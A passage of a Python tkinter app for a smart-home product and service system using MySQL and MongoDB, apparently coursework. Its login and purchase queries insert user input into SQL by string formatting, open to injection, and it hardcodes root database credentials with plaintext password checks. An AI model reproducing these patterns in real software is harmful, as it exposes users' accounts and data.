4.py","file_ext":"py","file_size_in_byte":1189,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"18045152796","text":"# Back End Packages\nimport json\nfrom logging import exception\nimport pandas as pd\nimport sqlalchemy as sqa\nimport pymongo as pymgo\nfrom mysqlaccessors import connectTo, executeQuery, readQuery\nfrom recreatemysql import reimportDB\nfrom datetime import datetime, date\nfrom dateutil.relativedelta import relativedelta\nfrom prepopulatemysql import (\n prepopulate_all,\n prepopulate_product,\n prepopulate_user,\n prepopulate_admin,\n)\nfrom warrantytest import setOld\n# Front-end Packages\nfrom tkinter import *\nfrom tkinter import messagebox\nfrom tkinter import ttk\n\nconnection = connectTo(\"localhost\", \"root\", \"password\", \"oshes\")\n\n\n# Misc Packages\nfrom dateutil.relativedelta import relativedelta\nfrom datetime import date\nfrom datetime import datetime\n\n# Connecting to MongoDB\nconnectMongo = pymgo.MongoClient(\"localhost\", 27017)\ndb = connectMongo[\"assignment1\"]\ncollectionProduct = db[\"products\"]\ncollectionItem = db[\"items\"]\n\n#################################################################################\n# BACK END MANAGEMENT SITE\n# Functions to implement\n# 1. user and admin Schemas\n# 2. Products Schemas\n# 3. Service Management Schemas\n#################################################################################\n#################################################################################\n# FRONT END MANAGEMENT SITE\n# 1. Login Page [Done]\n# 2. Home Page [Done]\n# 3.1. Item Listings Page [Done]\n# 3. Product Catalogue [Done]\n# 4. Item Information [Done]\n# 5. Service Management Listings Page [Done]\n# 6. Sign-up Page [Create new user] [Done]\n#################################################################################\n# Browser General Settings\nroot = Tk()\nroot.attributes(\"-fullscreen\", True)\n\n#################################################################################\n# 1. 
Login Page\n#################################################################################\ndef goToLogin():\n loginPage = Frame(\n root, highlightbackground=\"black\", highlightthickness=1, bg=\"grey\"\n )\n innerFrame = Frame(loginPage, highlightbackground = 'black', highlightthickness = 1)\n\n # Labels\n loginLabel = Label(\n loginPage,\n text=\"Smart Home Administration System\",\n relief=SUNKEN,\n bg=\"orange\",\n )\n loginLabel.place(relwidth=1, relheight=0.05)\n\n loginAsLabel = Label(innerFrame, text=\"Signing in As:\")\n loginAsLabel.place(relx=0.10, rely=0.4)\n\n usernameLabel = Label(innerFrame, text=\"Username: \")\n usernameLabel.place(relx=0.1, rely=0.10)\n\n passwordLabel = Label(innerFrame, text=\"Password: \")\n passwordLabel.place(relx=0.1, rely=0.2)\n\n # Functions\n def ender():\n root.destroy()\n\n def navToSignUp():\n loginPage.destroy()\n goToSignUp()\n\n def clicker():\n userId = userField.get()\n password = passField.get()\n userType = useGroup.get()\n checkerQueue = []\n out = \"Error: Login Credentials do not exist\"\n # customer\n if userType == 0:\n validate_query = (\n \"SELECT * FROM Customer WHERE customerId = '%s' AND password = '%s' \"\n % (userId, password)\n )\n results = readQuery(connection, validate_query)\n for result in results:\n checkerQueue.append(result)\n if len(checkerQueue) == 0:\n return messagebox.showerror(title=\"Error\", message=out)\n elif len(checkerQueue) != 0:\n person = checkerQueue[0]\n loginPage.destroy()\n return userHome(person)\n else:\n userField.delete(0, END)\n messagebox.askokcancel(\"Login Failure\", out)\n # admin\n else:\n validate_query = (\n \"SELECT * FROM Administrator WHERE adminID = '%s' AND password = '%s' \"\n % (userId, password)\n )\n results = readQuery(connection, validate_query)\n for result in results:\n checkerQueue.append(result)\n if len(checkerQueue) == 0:\n return messagebox.showerror(title=\"Error\", message=out)\n elif len(checkerQueue) != 0:\n person = checkerQueue[0]\n loginPage.destroy()\n return adminHome(person)\n else:\n userField.delete(0, END)\n messagebox.askokcancel(\"Login Failure\", out)\n\n # Fields\n userId = IntVar()\n userField = Entry(innerFrame, textvariable=userId, width=50)\n userField.place(relx=0.4, rely=0.10)\n userField.delete(0, END)\n\n passField = Entry(innerFrame, width=50)\n passField.place(relx=0.4, rely=0.2)\n passField.config(show=\"*\")\n\n # Buttons\n loginButton = Button(innerFrame, text=\"Login\", width=50, command=clicker, bg=\"green\")\n loginButton.place(relx=0.2, rely=0.6)\n\n quitButton = Button(\n innerFrame, text=\"End Program\", width=50, command=ender, bg=\"red\"\n )\n quitButton.place(relx=0.2, rely=0.9)\n\n signUpButton = Button(\n innerFrame, text=\"Sign Up\", width=50, command=navToSignUp, bg=\"blue\"\n )\n signUpButton.place(relx=0.2, rely=0.7)\n\n useGroup = IntVar()\n CustomerButton = Radiobutton(\n innerFrame, text=\"Customer\", variable=useGroup, value=0, font=(\"Mincho\", 10)\n )\n CustomerButton.place(relx=0.4, rely=0.4)\n\n AdminButton = Radiobutton(\n innerFrame, text=\"Admin\", variable=useGroup, value=1, font=(\"Mincho\", 10)\n )\n AdminButton.place(relx=0.6, rely=0.4)\n\n # Initialise\n loginPage.place(relwidth=1.0, relheight=1.0)\n innerFrame.place(relwidth = 0.4, relheight = 0.5, relx = 0.3, rely = 0.2)\n\n\n#################################################################################\n# 2. 
Home Page\n#################################################################################\ndef adminHome(person):\n # Frames\n homePage = Frame(root, bg=\"grey\")\n userInventory = Frame(\n homePage, highlightbackground=\"black\", highlightthickness=1, bg=\"grey\"\n )\n serviceManagementFrame = Frame(\n homePage, highlightbackground=\"black\", highlightthickness=1, bg=\"grey\"\n )\n\n # Labels\n homeLabel = Label(\n homePage,\n text=f\"Welcome, Administrator {person[1]}\",\n bg=\"violet\",\n relief=SUNKEN,\n )\n homeLabel2 = Label(homePage, text=\"Please select the service you wish to use:\")\n inventoryLabel = Label(\n userInventory, text=\"Product Management/Search/Admin Functions\", bg=\"yellow\"\n )\n serviceLabel = Label(\n serviceManagementFrame, text=\"Handle Service requests\", bg=\"yellow\"\n )\n\n homeLabel.place(relwidth=1, relheight=0.05)\n homeLabel2.place(relwidth=1, relheight=0.05, rely=0.05)\n inventoryLabel.place(relwidth=1, relheight=0.2)\n serviceLabel.place(relwidth=1, relheight=0.2)\n\n # Functions\n def servButton():\n homePage.destroy()\n serviceManagement(person)\n\n def logOut():\n homePage.destroy()\n goToLogin()\n\n def stockButton():\n homePage.destroy()\n adminProducts(person)\n\n\n # Buttons\n purchaseButton = Button(\n userInventory, text=\"Product Search\", command=stockButton, width=30, bg=\"green\"\n )\n\n\n serviceButton = Button(\n serviceManagementFrame,\n text=\"Service Management\",\n width=30,\n command=servButton,\n bg=\"green\",\n )\n logOutButton = Button(homePage, text=\"Log out\", width=50, command=logOut, bg=\"blue\")\n\n purchaseButton.place(relx=0.32, rely=0.5)\n serviceButton.place(relx=0.32, rely=0.5)\n logOutButton.place(relx=0.38, rely=0.6)\n\n # Initialise\n homePage.place(relwidth=1.0, relheight=1.0)\n userInventory.place(relwidth=0.4, relheight=0.3, relx=0.05, rely=0.2)\n serviceManagementFrame.place(relwidth=0.4, relheight=0.3, relx=0.55, rely=0.2)\n\n\ndef userHome(person):\n # Frames\n homePage = Frame(root, bg=\"grey\")\n userSearch = Frame(\n homePage, highlightbackground=\"black\", highlightthickness=1, bg=\"grey\"\n )\n requestManagementFrame = Frame(\n homePage, highlightbackground=\"black\", highlightthickness=1, bg=\"grey\"\n )\n\n # Labels\n homeLabel = Label(\n homePage, text=f\"Welcome, User {person[1]} \", bg=\"lightblue\", relief=SUNKEN\n )\n homeLabel2 = Label(homePage, text=\"Please select the service you wish to use:\")\n\n searchLabel = Label(userSearch, text=\"View our products in stock\", bg=\"yellow\")\n\n requestLabel = Label(\n requestManagementFrame,\n text=\"Request Servicing for your owned items\",\n bg=\"yellow\",\n )\n\n homeLabel.place(relwidth=1, relheight=0.05)\n homeLabel2.place(relwidth=1, relheight=0.05, rely=0.05)\n searchLabel.place(relwidth=1, relheight=0.2)\n requestLabel.place(relwidth=1, relheight=0.2)\n\n # Functions\n def goRequest():\n homePage.destroy()\n requestManagement(person)\n\n def goProduct():\n homePage.destroy()\n userProducts(person)\n\n def logOut():\n homePage.destroy()\n goToLogin()\n\n\n # Buttons\n stockCheckButton = Button(\n userSearch,\n text=\"Product Search and Purchase\",\n width=30,\n command=goProduct,\n bg=\"green\",\n )\n requestButton = Button(\n requestManagementFrame,\n text=\"Request Management\",\n width=30,\n command=goRequest,\n bg=\"green\",\n )\n\n logOutButton = Button(homePage, text=\"Log out\", width=50, command=logOut, bg=\"blue\")\n\n stockCheckButton.place(relx=0.32, rely=0.5)\n requestButton.place(relx=0.32, rely=0.5)\n 
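# NOTE (added comment): place() with relx/rely positions widgets as fractions\n# of the parent, so relx=0.38 below starts the button 38% across the page\n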
logOutButton.place(relx=0.38, rely=0.6)\n\n # Initialise\n homePage.place(relwidth=1.0, relheight=1.0)\n userSearch.place(relwidth=0.4, relheight=0.3, relx=0.05, rely=0.2)\n requestManagementFrame.place(relwidth=0.4, relheight=0.3, relx=0.55, rely=0.2)\n\n#################################################################################\n# 3.1 Item list page\n#################################################################################\ndef userItemPage(person, allItems, deets):\n validID = []\n\n #Frames\n itemListingsPage = Frame(root, bg = \"dark green\")\n itemTablesPage = Frame(itemListingsPage,\n highlightbackground = \"black\",\n highlightthickness = 1)\n\n # Labels\n titleLabel = Label(\n itemListingsPage, text=\"Item Listing\", relief=SUNKEN, bg=\"lightblue\"\n )\n titleLabel.place(relwidth=1, relheight=0.05)\n\n idSearchBarLabel = Label(itemListingsPage, text = \"Enter item ID: \")\n idSearchBarLabel.place(relx = 0.1, rely = 0.1)\n\n # Functions\n def singleItem():\n id = idSearchBarField.get()\n if id == \"\":\n messagebox.askokcancel(\"No ID detected\", 'Please input ID.')\n elif (id not in validID):\n messagebox.askokcancel(\"Invalid ID\", 'Item does not exist or already sold.')\n else:\n itemListingsPage.destroy()\n goToItem(person, id)\n\n\n def goHome():\n itemListingsPage.destroy()\n userProducts(person)\n \n def clearSearchBar():\n idSearchBarField.delete(0, END)\n\n def select_record(e):\n # delete current entry boxes\n clearSearchBar()\n selected = table.focus()\n attrs = table.item(selected)[\"values\"]\n\n idSearchBarField.insert(0, attrs[0])\n\n\n # Fields\n idSearchBarField = Entry(itemListingsPage, width=100)\n idSearchBarField.place(relx=0.25, rely=0.1)\n idSearchBarField.delete(0, END)\n\n # Buttons\n homeButton = Button(\n itemListingsPage,\n text=\"Return to Products\",\n width=20,\n command=goHome,\n bg=\"red\"\n )\n homeButton.place(relx=0.1, rely=0.2)\n\n descriptionButton = Button(itemListingsPage,\n text = \"Details\",\n width = 20,\n bg = \"blue\",\n command = singleItem)\n descriptionButton.place(relx = 0.7, rely = 0.1)\n\n # Tables\n colNames = [\"ID\", \"Category\", \"Model\", \"Sale Status\"]\n table = ttk.Treeview(itemTablesPage,\n column = colNames,\n show = \"headings\",\n height = 10,\n selectmode ='browse')\n verscrlbar = ttk.Scrollbar(itemTablesPage,\n orient=\"vertical\",\n command=table.yview)\n table.configure(yscrollcommand=verscrlbar.set)\n verscrlbar.pack(side=RIGHT, fill=Y)\n\n\n table.bind(\"\", select_record)\n\n theModel = deets[0]\n theCategory = deets[1]\n for item in allItems:\n if item[\"Category\"] == theCategory and item[\"Model\"] == theModel:\n validID.append(item[\"ItemID\"])\n toInsert = (\n item[\"ItemID\"],\n item[\"Category\"],\n item[\"Model\"],\n item[\"PurchaseStatus\"],\n )\n table.insert(\"\", \"end\", text=str(item), values=toInsert)\n for name in colNames:\n table.heading(name, text=name, anchor=CENTER)\n\n\n\n table.place(relwidth = 1, relheight = 1)\n\n # Initialise\n itemListingsPage.place(relwidth = 1, relheight = 1)\n itemTablesPage.place(relwidth = 1, relheight = 0.7, rely = 0.3)\n \ndef adminItemPage(person, allItems, deets):\n validID = []\n #Frames\n itemListingsPage = Frame(root, bg = \"dark green\")\n itemTablesPage = Frame(itemListingsPage,\n highlightbackground = \"black\",\n highlightthickness = 1)\n\n # Labels\n titleLabel = Label(\n itemListingsPage, text=\"Item Listing\", relief=SUNKEN, bg=\"violet\"\n )\n titleLabel.place(relwidth=1, relheight=0.05)\n\n idSearchBarLabel = Label(itemListingsPage, 
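# NOTE (added comment): the ID typed here is checked against validID\n                               # (collected from the rows listed below) before opening the item detail page\n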
text = \"Enter item ID: \")\n idSearchBarLabel.place(relx = 0.1, rely = 0.1)\n\n # Functions\n def singleItem():\n id = idSearchBarField.get()\n if id == \"\":\n messagebox.askokcancel(\"No ID detected\", 'Please input ID.')\n elif (id not in validID):\n messagebox.askokcancel(\"Invalid ID\", 'Item does not exist.')\n else:\n itemListingsPage.destroy()\n goToItem(person, id, True)\n\n def goHome():\n itemListingsPage.destroy()\n adminProducts(person)\n\n def clearSearchBar():\n idSearchBarField.delete(0,END)\n\n def select_record(e):\n # delete current entry boxes\n clearSearchBar()\n selected = table.focus()\n attrs = table.item(selected)[\"values\"]\n\n idSearchBarField.insert(0, attrs[0])\n\n # Fields\n idSearchBarField = Entry(itemListingsPage, width=100)\n idSearchBarField.place(relx=0.25, rely=0.1)\n idSearchBarField.delete(0, END)\n\n # Buttons\n homeButton = Button(\n itemListingsPage,\n text=\"Return to Products\",\n width=20,\n command=goHome,\n bg=\"red\"\n )\n homeButton.place(relx=0.1, rely=0.2)\n\n descriptionButton = Button(itemListingsPage,\n text = \"Details\",\n width = 20,\n bg = \"blue\",\n command = singleItem)\n descriptionButton.place(relx = 0.7, rely = 0.1)\n\n # Tables\n colNames = [\"ID\", \"Category\", \"Model\", \"Sale Status\"]\n table = ttk.Treeview(itemTablesPage,\n column = colNames,\n show = \"headings\",\n height = 10,\n selectmode ='browse')\n verscrlbar = ttk.Scrollbar(itemTablesPage,\n orient=\"vertical\",\n command=table.yview)\n table.configure(yscrollcommand=verscrlbar.set)\n verscrlbar.pack(side=RIGHT, fill=Y)\n\n table.bind(\"\", select_record)\n\n theModel = deets[0]\n theCategory = deets[1]\n\n for item in allItems:\n if item[\"Category\"] == theCategory and item[\"Model\"] == theModel:\n validID.append(item[\"ItemID\"])\n toInsert = (\n item[\"ItemID\"],\n item[\"Category\"],\n item[\"Model\"],\n item[\"PurchaseStatus\"],\n )\n table.insert(\"\", \"end\", text=str(item), values=toInsert)\n for name in colNames:\n table.heading(name, text=name, anchor=CENTER)\n\n\n\n table.place(relwidth = 1, relheight = 1)\n\n # Initialise\n itemListingsPage.place(relwidth = 1, relheight = 1)\n itemTablesPage.place(relwidth = 1, relheight = 0.7, rely = 0.3)\n \n#################################################################################\n# 3. 
Product Catalogue [Search page and listings]\n# list all products\n# search button\n# note: Remember to update MongoDB with the new JSON files Dr Danny Poo Uploaded\n#################################################################################\ndef userProducts(person):\n # Frames\n userProductPage = Frame(root)\n global listFrame\n searchFrame = Frame(\n userProductPage, highlightbackground=\"black\", highlightthickness=1, bg=\"grey\"\n )\n listFrame = Frame(\n userProductPage, highlightbackground=\"black\", highlightthickness=1\n )\n inventoryFrame = Frame(userProductPage, highlightbackground = \"black\", highlightthickness= 1)\n\n # Search inner Frames\n categoryFrame = Frame(searchFrame, highlightbackground = \"black\",highlightthickness= 1)\n modelFrame = Frame(searchFrame, highlightbackground=\"black\",highlightthickness= 1)\n filterFrame = Frame(searchFrame, highlightbackground = \"black\",highlightthickness= 1)\n\n # Labels\n instructionLabel = Label(searchFrame, text = \"Double Click a row under Product Listings to see items\",\n fg = 'white', bg = 'grey', font = ('arial', 12))\n instructionLabel.place(relx = 0.05, rely = 0.65)\n\n productLabel = Label(\n userProductPage, text=\"Product Page\", relief=SUNKEN, bg=\"lightblue\"\n )\n productLabel.place(relwidth=1, relheight=0.05)\n\n listTitleLabel = Label(userProductPage, text=\"Listings\", relief=SUNKEN, bg=\"pink\")\n listTitleLabel.place(relheight = 0.05, relwidth = 0.7, relx = 0.3, rely = 0.05)\n\n priceLimitLabel = Label(filterFrame, text=\"Maximum Price\")\n priceLimitLabel.place(relx=0.05, rely=0.2)\n\n colourLabel = Label(filterFrame, text=\"Colour\")\n colourLabel.place(relx=0.05, rely=0.4)\n\n factoryLabel = Label(filterFrame, text=\"Factory\")\n factoryLabel.place(relx=0.05, rely=0.6)\n\n yearLabel = Label(filterFrame, text=\"Year\")\n yearLabel.place(relx=0.05, rely=0.8)\n\n categoryLabel = Label(categoryFrame, text=\"Category\", relief=SUNKEN, bg=\"yellow\")\n categoryLabel.place(relheight = 0.3, relwidth = 1)\n\n modelLabel = Label(modelFrame, text=\"Model\", relief=SUNKEN, bg=\"yellow\")\n modelLabel.place(relheight = 0.1, relwidth = 1)\n\n yourInventoryLabel = Label(inventoryFrame, text = \"Your Inventory\", relief=SUNKEN, bg=\"orange\")\n yourInventoryLabel.place(relheight = 0.1, relwidth = 1)\n\n filterLabel =Label(filterFrame, text = \"Filter\", relief=SUNKEN, bg=\"yellow\")\n filterLabel.place(relheight=0.15, relwidth=1)\n\n # Tables\n detailNames = ['ItemID', 'Color', 'Factory', 'PowerSupply', 'ProductionYear', 'Model','Service Status']\n myInventoryTable = ttk.Treeview(inventoryFrame, column=detailNames, show=\"headings\", height=5)\n for name in detailNames:\n myInventoryTable.heading(name, text=name, anchor=CENTER)\n myInventoryTable.column(name, anchor=CENTER, stretch=NO, width=150)\n test_query = \"SELECT * FROM Purchase WHERE customerID = '%s' \" % (person[0])\n results = readQuery(connection, test_query)\n if results != []:\n for item in results:\n test_query2 = \"SELECT * FROM Item WHERE purchaseID = '%s' \" % (item[0])\n mydetails = readQuery(connection, test_query2)[0]\n myInventoryTable.insert(\"\",\"end\",text=str(item), values=(int(mydetails[0]),) + mydetails[1:4] + (int(mydetails[4]), mydetails[5], mydetails[6]))\n\n myInventoryTable.place(relheight = 0.9, relwidth = 1, rely = 0.1)\n\n # Functions\n def searchTings():\n selected = example.get()\n selectedPrice = priceField.get()\n if selectedPrice != \"\":\n selectedPrice = int(priceField.get())\n\n if selected == \"Search by...\":\n # Never 
specify search filter, display all unsold items\n cats = [lightVar.get(), locksVar.get()]\n sql = collectionItem.find({\"PurchaseStatus\": \"Unsold\"})\n createTable(sql, selectedPrice)\n # messagebox.askokcancel(\"Search Error\", \"Please input a Category\")\n elif selected == \"Category\":\n cats = [lightVar.get(), locksVar.get()]\n selectedColor = colourBox.get()\n selectedFactory = factoryBox.get()\n selectedYear = yearBox.get()\n # if selectedYear != \"\":\n # selectedYear = int(selectedYear)\n\n selections = [selectedColor, selectedFactory, selectedYear]\n selectionsSQL = [\n {\"Color\": selectedColor},\n {\"Factory\": selectedFactory},\n {\"ProductionYear\": selectedYear},\n ]\n and_query_arr = [\n {\"$or\": [{\"Category\": cats[0]}, {\"Category\": cats[1]}]},\n {\"PurchaseStatus\": \"Unsold\"},\n ]\n and_query_arr = and_query_arr + [\n selectionsSQL[i] for i in range(len(selections)) if selections[i] != \"\"\n ]\n sql = collectionItem.find({\"$and\": and_query_arr})\n createTable(sql, selectedPrice)\n\n elif selected == \"Model\":\n models = [\n light1Var.get(),\n light2Var.get(),\n safe1Var.get(),\n safe2Var.get(),\n safe3Var.get(),\n smartHome1Var.get(),\n ]\n selectedColor = colourBox.get()\n selectedFactory = factoryBox.get()\n selectedYear = yearBox.get()\n\n selections = [selectedColor, selectedFactory, selectedYear]\n selectionsSQL = [\n {\"Color\": selectedColor},\n {\"Factory\": selectedFactory},\n {\"ProductionYear\": selectedYear},\n ]\n and_query_arr = [\n {\n \"$or\": [\n {\"Model\": models[0]},\n {\"Model\": models[1]},\n {\"Model\": models[2]},\n {\"Model\": models[3]},\n {\"Model\": models[4]},\n {\"Model\": models[5]},\n ]\n },\n {\"PurchaseStatus\": \"Unsold\"},\n ]\n and_query_arr = and_query_arr + [\n selectionsSQL[i] for i in range(len(selections)) if selections[i] != \"\"\n ]\n sql = collectionItem.find({\"$and\": and_query_arr})\n createTable(sql, selectedPrice)\n\n else:\n messagebox.askokcancel(\"Search Error\", \"No such product\")\n\n def createTable(items, selectedPrice):\n allItems = []\n global listFrame\n listFrame.destroy()\n listFrame = Frame(\n userProductPage, highlightbackground=\"black\", highlightthickness=1\n )\n sql = \"\"\n categoryValues = []\n modelValues = []\n categoryModel = [\n \"LightsLight1\",\n \"LightsLight2\",\n \"LightsSmartHome1\",\n \"LocksSafe1\",\n \"LocksSafe2\",\n \"LocksSafe3\",\n \"LocksSmartHome1\",\n ]\n instockValues = [0, 0, 0, 0, 0, 0, 0]\n\n for item in items:\n allItems.append(item)\n index = 0\n categoryModelPair = item[\"Category\"] + item[\"Model\"]\n\n index = categoryModel.index(categoryModelPair)\n\n if item[\"Category\"] not in categoryValues:\n categoryValues.append(item[\"Category\"])\n if item[\"Model\"] not in modelValues:\n modelValues.append(item[\"Model\"])\n instockValues[index] = instockValues[index] + 1\n else:\n instockValues[index] = instockValues[index] + 1\n\n numModels = len(modelValues)\n # Test if there is value in category and model\n oneCat = False\n # Test if theres 2 catorgoires i.e user never select category\n twoCat = False\n try:\n numCat = len(categoryValues)\n if numCat == 2:\n twoCat = True\n oneCat = True\n except:\n print(\"No value on either category or model\")\n print(len(categoryValues))\n print(len(modelValues))\n\n if twoCat:\n if selectedPrice == \"\":\n sql = collectionProduct.find(\n {\n \"$or\": [\n {\n \"$and\": [\n {\"Model\": modelValue},\n ]\n }\n for modelValue in modelValues\n ]\n }\n )\n\n else:\n sql = collectionProduct.find(\n {\n \"$or\": [\n {\n \"$and\": [\n 
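# NOTE (illustrative; m1/m2 are placeholder model names): with no price cap\n                                            # each $and holds a single Model match, so for models [m1, m2] this builds\n                                            # {\"$or\": [{\"$and\": [{\"Model\": m1}]}, {\"$and\": [{\"Model\": m2}]}]}\n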
{\"Model\": modelValue},\n {\"Price ($)\": {\"$lte\": selectedPrice}},\n ]\n }\n for modelValue in modelValues\n ]\n }\n )\n\n elif oneCat:\n\n if selectedPrice == \"\":\n sql = collectionProduct.find(\n {\n \"$or\": [\n {\n \"$and\": [\n {\"Category\": categoryValues[0]},\n {\"Model\": modelValue},\n ]\n }\n for modelValue in modelValues\n ]\n }\n )\n else:\n sql = collectionProduct.find(\n {\n \"$or\": [\n {\n \"$and\": [\n {\"Category\": categoryValues[0]},\n {\"Model\": modelValue},\n {\"Price ($)\": {\"$lte\": selectedPrice}},\n ]\n }\n for modelValue in modelValues\n ]\n }\n )\n\n columnNames = (\n \"Category\",\n \"Model\",\n \"Price ($)\",\n \"Warranty (months)\",\n \"In Stock\",\n )\n \n table = ttk.Treeview(listFrame, column=columnNames, show=\"headings\", height=10)\n for name in columnNames:\n table.heading(name, text=name, anchor=CENTER)\n\n for item in sql:\n categoryModelPair = item[\"Category\"] + item[\"Model\"]\n toInsert = (\n item[\"Category\"],\n item[\"Model\"],\n item[\"Price ($)\"],\n item[\"Warranty (months)\"],\n instockValues[categoryModel.index(categoryModelPair)],\n )\n table.insert(\"\", \"end\", text=str(item), values=toInsert)\n\n table.place(relwidth=1, relheight=1)\n listFrame.place(relwidth=0.7, relheight=0.6, relx=0.3, rely=0.1)\n\n #Binding Click\n def clicking(e):\n selected = table.focus()\n theCategory = table.set(selected, 'Model')\n theModel = table.set(selected, 'Category')\n\n userProductPage.destroy()\n userItemPage(person, allItems, [theCategory, theModel])\n\n\n #Binding\n table.bind(\"\", clicking)\n\n def goHome():\n userProductPage.destroy()\n userHome(person)\n\n # Fields\n priceValues = [\"\", \"50\", \"70\", \"100\", \"120\", \"200\"]\n priceField = ttk.Combobox(filterFrame, values=priceValues)\n priceField.place(relx=0.5, rely=0.2)\n\n # Combobox\n example = ttk.Combobox(searchFrame, values=[\"Search by...\", \"Category\", \"Model\"])\n example.current(0)\n example.place(relx=0.05, rely=0.70)\n\n colourValues = []\n colourValues.append(\"\")\n factoryValues = []\n factoryValues.append(\"\")\n yearValues = []\n yearValues.append(\"\")\n all = collectionItem.find()\n for item in all:\n if item[\"Color\"] not in colourValues:\n colourValues.append(item[\"Color\"])\n if item[\"Factory\"] not in factoryValues:\n factoryValues.append(item[\"Factory\"])\n if item[\"ProductionYear\"] not in yearValues:\n yearValues.append(item[\"ProductionYear\"])\n colourBox = ttk.Combobox(filterFrame, values=colourValues)\n factoryBox = ttk.Combobox(filterFrame, values=factoryValues)\n yearBox = ttk.Combobox(filterFrame, values=yearValues)\n\n colourBox.place(relx=0.5, rely=0.4)\n factoryBox.place(relx=0.5, rely=0.6)\n yearBox.place(relx=0.5, rely=0.8)\n\n # Checkboxes for Category\n lightVar = StringVar()\n locksVar = StringVar()\n\n lightBox = Checkbutton(\n categoryFrame, text=\"Lights\", variable=lightVar, onvalue=\"Lights\", offvalue=\"\"\n )\n locksBox = Checkbutton(\n categoryFrame, text=\"Locks\", variable=locksVar, onvalue=\"Locks\", offvalue=\"\"\n )\n\n lightBox.place(relx=0.1, rely=0.4)\n locksBox.place(relx=0.5, rely=0.4)\n\n # Checkboxes for Models\n light1Var = StringVar()\n light2Var = StringVar()\n safe1Var = StringVar()\n safe2Var = StringVar()\n safe3Var = StringVar()\n smartHome1Var = StringVar()\n\n light1Box = Checkbutton(\n modelFrame, text=\"Light 1\", variable=light1Var, onvalue=\"Light1\", offvalue=\"\"\n )\n light2Box = Checkbutton(\n modelFrame, text=\"Light 2\", variable=light2Var, onvalue=\"Light2\", offvalue=\"\"\n )\n safe1Box 
= Checkbutton(\n modelFrame, text=\"Safe 1\", variable=safe1Var, onvalue=\"Safe1\", offvalue=\"\"\n )\n safe2Box = Checkbutton(\n modelFrame, text=\"Safe 2\", variable=safe2Var, onvalue=\"Safe2\", offvalue=\"\"\n )\n safe3Box = Checkbutton(\n modelFrame, text=\"Safe 3\", variable=safe3Var, onvalue=\"Safe3\", offvalue=\"\"\n )\n smartHome1Box = Checkbutton(\n modelFrame,\n text=\"Smart Home 1\",\n variable=smartHome1Var,\n onvalue=\"SmartHome1\",\n offvalue=\"\",\n )\n\n light1Box.place(relx=0.1, rely=0.35)\n light2Box.place(relx=0.4, rely=0.35)\n safe1Box.place(relx=0.7, rely=0.35)\n safe2Box.place(relx=0.1, rely=0.6)\n safe3Box.place(relx=0.4, rely=0.6)\n smartHome1Box.place(relx=0.7, rely=0.6)\n\n # Buttons\n searchButton = Button(\n searchFrame,\n text=\"Search\",\n width=10,\n height=3,\n command=lambda: searchTings(),\n bg=\"green\",\n )\n homeButton = Button(\n searchFrame, text=\"Return to Home\", width=30, command=goHome, bg=\"red\"\n )\n searchButton.place(relx=0.75, rely=0.7)\n homeButton.place(relx=0.2, rely=0.9)\n\n # Initialise\n userProductPage.place(relwidth=1, relheight=1)\n searchFrame.place(relwidth=0.3, relheight=0.95, relx=0, rely=0.05)\n listFrame.place(relwidth=0.7, relheight=0.6, relx=0.3, rely=0.1)\n inventoryFrame.place(relwidth=0.7, relheight=0.3, relx=0.3, rely=0.7)\n categoryFrame.place(rely = 0.2, relx= 0.05, relwidth = 0.9, relheight = 0.1)\n modelFrame.place(rely = 0.35, relx=0.05, relwidth=0.9, relheight=0.25)\n filterFrame.place(relx = 0.05, rely = 0.02, relwidth = 0.9, relheight = 0.15)\n\n\ndef adminProducts(person):\n # Frames\n adminProductPage = Frame(root)\n global listFrame\n searchFrame = Frame(\n adminProductPage, highlightbackground=\"black\", highlightthickness=1, bg=\"grey\"\n )\n listFrame = Frame(\n adminProductPage, highlightbackground=\"black\", highlightthickness=1\n )\n\n # Search inner Frames\n categoryFrame = Frame(searchFrame, highlightbackground = \"black\",highlightthickness= 1)\n modelFrame = Frame(searchFrame, highlightbackground=\"black\",highlightthickness= 1)\n filterFrame = Frame(searchFrame, highlightbackground = \"black\",highlightthickness= 1)\n\n # Labels\n instructionLabel = Label(searchFrame, text = \"Double Click a row under Product Listings to see items\",\n fg = 'white', bg = 'grey', font = ('arial', 12))\n instructionLabel.place(relx = 0.05, rely = 0.65)\n productLabel = Label(\n adminProductPage, text=\"Product Page\", relief=SUNKEN, bg=\"violet\"\n )\n productLabel.place(relwidth=1, relheight=0.05)\n\n listTitleLabel = Label(adminProductPage, text=\"Listings\", relief=SUNKEN, bg=\"pink\")\n listTitleLabel.place(relheight = 0.05, relwidth = 0.7, relx = 0.3, rely = 0.05)\n\n priceLimitLabel = Label(filterFrame, text=\"Maximum Price\")\n priceLimitLabel.place(relx=0.05, rely=0.2)\n\n colourLabel = Label(filterFrame, text=\"Colour\")\n colourLabel.place(relx=0.05, rely=0.4)\n\n factoryLabel = Label(filterFrame, text=\"Factory\")\n factoryLabel.place(relx=0.05, rely=0.6)\n\n yearLabel = Label(filterFrame, text=\"Year\")\n yearLabel.place(relx=0.05, rely=0.8)\n\n categoryLabel = Label(categoryFrame, text=\"Category\", relief=SUNKEN, bg=\"yellow\")\n categoryLabel.place(relheight=0.3, relwidth=1)\n\n modelLabel = Label(modelFrame, text=\"Model\", relief=SUNKEN, bg=\"yellow\")\n modelLabel.place(relheight=0.1, relwidth=1)\n\n filterLabel = Label(filterFrame, text=\"Filter\", relief=SUNKEN, bg=\"yellow\")\n filterLabel.place(relheight=0.15, relwidth=1)\n\n def searchTings():\n selected = example.get()\n selectedPrice = 
priceField.get()\n if selectedPrice != \"\":\n selectedPrice = int(priceField.get())\n\n if selected == \"Search by...\":\n # No search filter specified, display all items\n cats = [lightVar.get(), locksVar.get()]\n sql = collectionItem.find({})\n createTable(sql, selectedPrice)\n # messagebox.askokcancel(\"Search Error\", \"Please input a Category\")\n elif selected == \"Category\":\n cats = [lightVar.get(), locksVar.get()]\n selectedColor = colourBox.get()\n selectedFactory = factoryBox.get()\n selectedYear = yearBox.get()\n\n selections = [selectedColor, selectedFactory, selectedYear]\n selectionsSQL = [\n {\"Color\": selectedColor},\n {\"Factory\": selectedFactory},\n {\"ProductionYear\": selectedYear},\n ]\n and_query_arr = [\n {\"$or\": [{\"Category\": cats[0]}, {\"Category\": cats[1]}]}\n ]\n and_query_arr = and_query_arr + [\n selectionsSQL[i] for i in range(len(selections)) if selections[i] != \"\"\n ]\n sql = collectionItem.find({\"$and\": and_query_arr})\n\n createTable(sql, selectedPrice)\n\n elif selected == \"Model\":\n models = [\n light1Var.get(),\n light2Var.get(),\n safe1Var.get(),\n safe2Var.get(),\n 